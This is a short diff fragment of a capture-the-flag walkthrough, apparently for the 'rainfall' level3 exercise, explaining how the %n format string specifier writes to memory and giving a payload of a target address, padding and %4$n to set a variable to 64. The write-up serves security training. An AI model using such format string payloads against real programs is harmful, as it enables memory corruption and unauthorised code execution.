postCC42/rainfall/level3/walkthrough.md

 `%n` will write the size of our input at the address pointed by `%n`.
 For example, the following input : `AAAA%n`, means that we will write the value 4 (because the size of “AAAA” equals 4) at the address pointed by %n.
 - We can specify a postion to read/write on the stack with `%<num>$n`
+- We need to set the value of m to 64, so we add 60 bytes of arbitrary data.

 ```
 \x8c\x98\x04\x08   AAAAAAAA...AAAA    %4$n